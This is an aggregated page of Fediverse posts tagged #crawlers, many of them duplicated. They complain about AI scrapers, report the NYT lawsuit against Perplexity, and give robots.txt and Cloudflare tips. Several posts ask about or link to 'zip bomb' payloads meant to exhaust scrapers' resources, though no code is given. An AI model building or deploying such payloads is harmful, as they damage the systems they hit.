home.social

#crawlers — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #crawlers, aggregated by home.social.

  1. Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  2. Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  3. Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  4. Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  5. Fucking #crawlers of #meta #facebook #apple #google are easting bandwidth and creating nonsense. In the last 3 days meta developer crawlers alone ate up 850GB+ #bandwidth. Assholes.

  6. 🤖 The Confederation of Open Access Repositories (COAR) has just announced the new Dealing with AI Bots website (dealing-with-bots.coar-reposit) that provides a wealth of information on bots and #crawlers impacting the services and operations of open #repositories, including mitigation strategies; see:
    coar-repositories.org/news-upd

  7. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  8. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  9. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  10. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  11. #scrapers and #crawlers are waging a constant #DDOS on our site and driving up cloud hosting costs. We’re coping, but if it keeps getting worse, will OHM last? 🫠

  12. The New York Times sues Perplexity for producing ‘verbatim’ copies of its work – The Verge

    Credit: NYT Times, gettyimages-2249036304

    The New York Times sues Perplexity for producing ‘verbatim’ copies of its work

    The NYT alleges Perplexity ‘unlawfully crawls, scrapes, copies, and distributes’ work from its website.

    by Emma Roth, Dec 5, 2025, 7:42 AM PS, Emma Roth is a news writer who covers the streaming wars, consumer tech, crypto, social media, and much more. Previously, she was a writer and editor at MUO.

    The New York Times has escalated its legal battle against the AI startup Perplexity, as it’s now suing the AI “answer engine” for allegedly producing and profiting from responses that are “verbatim or substantially similar copies” of the publication’s work.

    The lawsuit, filed in a New York federal court on Friday, claims Perplexity “unlawfully crawls, scrapes, copies, and distributes” content from the NYT. It comes after the outlet’s repeated demands for Perplexity to stop using content from its website, as the NYT sent cease-and-desist notices to the AI startup last year and most recently in July, according to the lawsuit. The Chicago Tribune also filed a copyright lawsuit against Perplexity on Thursday.

    The New York Times sued OpenAI for copyright infringement in December 2023, and later inked a deal with Amazon, bringing its content to products like Alexa.

    Perplexity became the subject of several lawsuits after reporting from Forbes and Wired revealed that the startup had been skirting websites’ paywalls to provide AI-generated summaries — and in some cases, copies — of their work. TheNYT makes similar accusations in its lawsuit, stating that Perplexity’s crawlers “have intentionally ignored or evaded technical content protection measures,” such as the robots.txt file, which indicates the parts of a website crawlers can access.

    Perplexity attempted to smooth things over by launching a program to share ad revenue with publishers last year, which it later expanded to include its Comet web browser in August.

    Related

    “By copying The Times’s copyrighted content and creating substitutive output derived from its works, obviating the need for users to visit The Times’s website or purchase its newspaper, Perplexity is misappropriating substantial subscription, advertising, licensing, and affiliate revenue opportunities that belong rightfully and exclusively to The Times,” the lawsuit states.

    Continue/Read Original Article Here: The New York Times sues Perplexity for producing ‘verbatim’ copies of its work | The Verge

    Tags: AI, artificial intelligence, Copyright, Crawlers, Distribution, Lawsuit, NYT Work, OpenAI, Perplexity, Robots.txt, Scrapping, Sues, The New York Times, The Verge, Verbatim Copies

    #AI #artificialIntelligence #Copyright #Crawlers #Distribution #Lawsuit #NYTWork #OpenAI #Perplexity #RobotsTxt #Scrapping #Sues #TheNewYorkTimes #TheVerge #VerbatimCopies

  13. 🤖🎉 Wow, #AI #crawlers are now the Indiana Jones of #Codeberg, fearlessly solving #Anubis #challenges while we mere mortals fumble with #JavaScript on Mastodon. 🙄 Clearly, the robots are one step closer to world domination, and we're still struggling to open our native apps. 📱💥
    social.anoxinon.de/@Codeberg/1 #WorldDomination #HackerNews #ngated

  14. I've been getting a lot of weird "domain as a URL" requests for flyriver.com. Decided to look it up and… I'm confused.

    Their site says "Is your site being used by AI Generators?" but then it also says "Or, generate an exact article based on your query:"

    The former seems like an "is your content getting ripped off?" question, but then the second bit is "hey, want to rip off other people's content?" 🧐

    #GenAI #Crawlers #FOAD

  15. A valid bomb

    The initial problem is the aggressiveness of web that don't respect "robots.txt". The first idea that comes to mind is IP . However, web crawlers have circumvented this restriction by using individual IPs via specialized .

    Another solution is therefore to exhaust the resources of the harvesters. With a , we attempt to their .

    💭 ache.one/notes/html_zip_bomb

  16. Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

    #hacking #aislop #crawlers #webscraping #webcrawler #robots #zipbomb #zipbombing #exploit #robotstxt #server #scraper

  17. Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

    #hacking #aislop #crawlers #webscraping #webcrawler #robots #zipbomb #zipbombing #exploit #robotstxt #server #scraper

  18. Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

    #hacking #aislop #crawlers #webscraping #webcrawler #robots #zipbomb #zipbombing #exploit #robotstxt #server #scraper

  19. Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.

    #hacking #aislop #crawlers #webscraping #webcrawler #robots #zipbomb #zipbombing #exploit #robotstxt #server #scraper

  20. It looks like LLM-producing companies that are massively #crawling the #web require the owners of a website to take action to opt out. Albeit I am not intrinsically against #generativeai and the acquisition of #opendata, reading about hundreds of dollars of rising #cloud costs for hobby projects is quite concerning. How is it accepted that hypergiants skyrocket the costs of tightly budgeted projects through massive spikes in egress traffic and increased processing requirements? Projects that run on a shoestring budget and are operated by volunteers who dedicated hundreds of hours without any reward other than believing in their mission?

    I am mostly concerned about the default of opting out. Are the owners of those projects required to take action? Seriously? As an #operator, it would be my responsibility to methodically work myself through the crawling documentation of the hundreds of #LLM #web #crawlers? I am the one responsible for configuring a unique crawling specification in my robots.txt because hypergiants make it immanently hard to have generic #opt-out configurations that tackle LLM projects specifically?

    I reject to accept that this is our new norm. A norm in which hypergiants are not only methodically exploiting the work of thousands of individuals for their own benefit and without returning a penny. But also a norm, in which the resource owner is required to prevent these crawlers from skyrocketing one's own operational costs?

    We require a new #opt-in. Often, public and open projects are keen to share their data. They just don't like the idea of carrying the unpredictable, multitudinous financial burden of sharing the data without notice from said crawlers. Even #CommonCrawl has safe-fail mechanisms to reduce the burden on website owners. Why are LLM crawlers above the guidelines of good #Internet citizenship?

    To counter the most common argument already: Yes, you can deny-by-default in your robots.txt, but that excludes any non-mainstream browser, too.

    Some concerning #news articles on the topic:

    #webcrawling #crawler #web #opensource

  21. If you have established Websites and wish to isolate them from search engines such as Google and other crawlers, place a text file named robots.txt with the following wording in the root directory of your Web site:

    User-agent: *Disallow: /

    The top line targets all crawlers, and the bottom line targets all files under the root directory for non-permission.

    It is convenient because only two lines are needed to reject all crawlers, but placing this in place would leave all crawlers, which may harm search indexing and other aspects of the site. If there are any adverse effects, you can narrow the list of crawlers to reject and define them individually.

    WordPress robots.txt can be edited safely using the following plug-ins without placing the text file directly in the root directory:

    By the way; there is something I have been thinking about for a while that I would like to realize so that I will write it here.

    Speaking of Cloudflare Tunnel, a revolutionary mechanism that allows you to securely expose your servers from inside your router rather than from the DMZ, and Cloudflare One/Cloudflare WARP, a combination of a gateway to securely access those contents on the go and a WireGuard client with MDM capabilities to connect to it.

    For a long time, I have wanted to use Cloudflare Tunnel and Cloudflare WARP on the same server simultaneously, but that has been challenging to achieve. Sometimes, it degrades the Tunnel, or the server is unusable even when the Tunnel port is open.

    I did a Google search and found the following exchange on a thread in the Cloudflare Community:

    I have ‘degraded status’ when using WARP with Zero Trust

    “Just open the specified port,” the Cloudflare staff responded, but that didn’t work for me.

    Now, I asked ChatGPT about it.

    Using Cloudflare Tunnel and Cloudflare WARP on the same server can indeed be a bit challenging due to potential conflicts in network configurations and routing. However, it’s not impossible to set them up together. Here are some tips and considerations to help you achieve this:

    1. Port Conflicts:
      • Make sure that the ports used by Cloudflare Tunnel and Cloudflare WARP do not conflict. Check the default ports used by each service and configure them accordingly. You might need to adjust the settings for one of the services to use a different set of ports.
    2. Routing Issues:
      • Ensure that there are no conflicting routing rules between the two services. This can be particularly tricky because both services might try to manipulate the server’s network stack. Carefully review the routing tables to avoid conflicts.
    3. Firewall Settings:
      • Check your server’s firewall settings to ensure that it allows traffic for both Cloudflare Tunnel and Cloudflare WARP. If you are using iptables or another firewall tool, make sure that the necessary ports are open and traffic is allowed.
    4. Concurrency and Resources:
      • Consider the resource requirements of both services. Running both services simultaneously may consume a significant amount of system resources (CPU, memory, etc.). Ensure that your server has enough resources to handle the load. You can monitor resource usage using tools like top or htop.
    5. Logging and Debugging:
      • Enable logging for both Cloudflare Tunnel and Cloudflare WARP. Examine the logs for any error messages or warnings that might indicate conflicts or issues. This can help you pinpoint the source of the problem.
    6. Configuration Order:
      • Try starting the services in a specific order. For example, start one service first and ensure it’s working correctly before starting the second one. The order in which services are initialized can sometimes affect their behavior.
    7. Documentation and Support:
      • Refer to the official documentation of both Cloudflare Tunnel and Cloudflare WARP. Check if there are any specific guidelines or recommendations for running them together. Additionally, check the support forums or communities for both services to see if others have encountered similar issues.
    8. Separate Instances:
      • As a last resort, you might consider running Cloudflare Tunnel and Cloudflare WARP on separate instances or virtual machines. This ensures complete isolation and avoids potential conflicts.

    Remember to make backups or snapshots of your server before making significant changes, and proceed with caution, especially if the server is in a production environment. If the issues persist, reaching out to Cloudflare support may provide additional assistance tailored to your specific setup.

    If you ask a professional engineer, you will get this answer. But it’s the answer for someone who has never touched Cloudflare.

    Does anyone know how to countermeasure against this “degraded?”

    https://kotaromiyasaka.com/search-engine-rejection-by-robots-txt-and-cloudflare-tunnel-failure/

    #chatgpt #cloudflare #crawlers #degraded #disallow #firefish #google #mdm #one #plugin #robotsTxt #server #tunnel #warp #wireguard #wordpress #wprobotstxt #zerotrust